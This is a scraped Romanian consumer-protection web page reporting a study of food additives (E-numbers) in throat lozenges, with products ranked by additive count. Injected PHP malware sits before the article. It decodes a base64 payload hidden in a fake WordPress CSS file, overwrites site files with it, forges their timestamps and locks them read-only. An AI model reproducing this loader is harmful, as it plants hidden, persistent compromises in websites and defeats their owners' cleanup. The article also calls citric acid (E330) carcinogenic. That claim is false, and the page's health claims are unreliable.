$wp_update_file="/home/shuffles/public_html/wp-includes/css/wp-timer.css"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Protectia-Consumatorilor.ro -Analiza etichetelor produselor farmaceutice – O noua atitudine


Majoritatea produselor alimentare din magazine au în compoziţie E-uri. Dacă unele dintre acestea sunt considerate inofensive, majoritatea sunt nocive pentru sănătate dacă sunt consumate pe perioade mari de timp . In  România legislaţia permite producătorilor să nu mai scrie pe etichetă E122,E300 etc. precizindu-se doar denumirea  ştiinţifică a aditivului astfel se crează confuzie în mintea consumatorului care consideră produsele respective ca fiind lipsite de E-uri.
Produsele folosite în tratarea simptomelor de răceală (dureri în gât) conţin o serie de aditivi alimentari unii dintre aceştia fiind cu potenţial cancerigen sau prezentând alte pericole pentru sănătate.
Din cele 24 de produse analizate se pot trage urmatoarele concluzii:
-doar două produse nu conţin E-uri;
-celelalte conţin un număr variabil între 2-6 E-uri;
-29% dintre produse nu conţin E-uri sau conţin aşa numitele E-uri inofensive;
-71% conţin E-uri periculoase. In această categorie sunt incluse:
    E-uri cancerigene (E 330;E110;E104) prezente in 8 produse;
    E-uri cu potenţial cancerigen adică îndulcitorii:E950;E951;E953;
    E-uri interzise în unele ţări ca S.U.A; Suedia, Japonia dar care în UE se evaluează încă în privinţa   riscului asupra  sănătăţii (E122)
    E-uri de tip coloranţi cu efecte de tip alergic asupra organismului (E132;E124).

Se poate spune în concluzie că aceste produse destinate tratamentului medical conţin pe lângă substanţe active benefice şi o serie de aditivi a căror acţiune este mai mult decât îndoielnică asupra sănătăţii.

Numarul de E-uri
Şase E-uri:
Strepsils, Orange Vitamina C (produs Reckitt Benckiser)
Cinci E-uri
Tantum Verde P (produs de Angelini)
Propolis Natural (produs de Fiterman Pharma)
Tantum Lemon (produs de Angelini)
Neovox, Mentol-Lămâie (produs de Sodimed)
Patru E-uri
Propolets (produs de Nepentes)
Propolis C (produs de Fiterman Pharma)
Strepsils Lemon fără zahăr (produs Reckitt Benckiser)
Trei E-uri
Decasept (produs de Amniocen)
Strepsils Clasic (produs Reckitt Benckiser)
Strepsils Plus (produs Reckitt Benckiser)
Două E-uri
Hexoraletten N (produs de Mcneil Products Limited c/o Johnson and Johnson)
Neovox, Mentol Eucalipt (produs de Sodimed)
Voseptol V (produs de S.C. CCPPM)
Strepsils, Miere şi Lămâie (produs Reckitt Benckiser)
Strepsils, Mentol (produs Reckitt Benckiser)
Un singur E
Strepsils Intensiv (produs Reckitt Benckiser)
Trachisept Mentol şi eucalipt (PPH „EWA” SA)
Trachisept Junior (PPH „EWA” SA)
Faringosept Simplu (produs de SC Terapia)
Trachisan (produs de Engelhard Arzneimittel GmbH & Co KG)
Faringosept Lămâie (produs de SC Terapia)
Zero E-uri
Trachisept, Miere şi Propolis (PPH „EWA” SA)
Tonsilend, Aromă de portocale (Gepach International)
 
Produsele care contin E330 –acid citric cancerigen:
-Neovox mentol eucalipt (pozitia 5)
-Neovox mentol lamiie (pozitia 6)
-Propolets (pozitia 7)
-trachisept mentol si eucalipt (pozitia 17)
– trachisept junior(pozitia 18)
-tantum verde P(pozitia 21)
– tantum lemon(pozitia 22)

E330 –acid citric +E110-colorant cu potential cancerigen
-strepsils orange vit C(pozitia 14)
Produse care contin indulcitori ce par sa aiba efecte cancerigene E-950;E953;E951
    Produsele de la urmatoarele pozitii din tabel:4;8;9;12;21;22

Acest studiu a fost realizat in parteneriat cu Facultatea de Alimentatie si Turism, Catedra de Inginerie si Management in Turism din cadrul Universitatii Transilvania Brasov.

By o9admin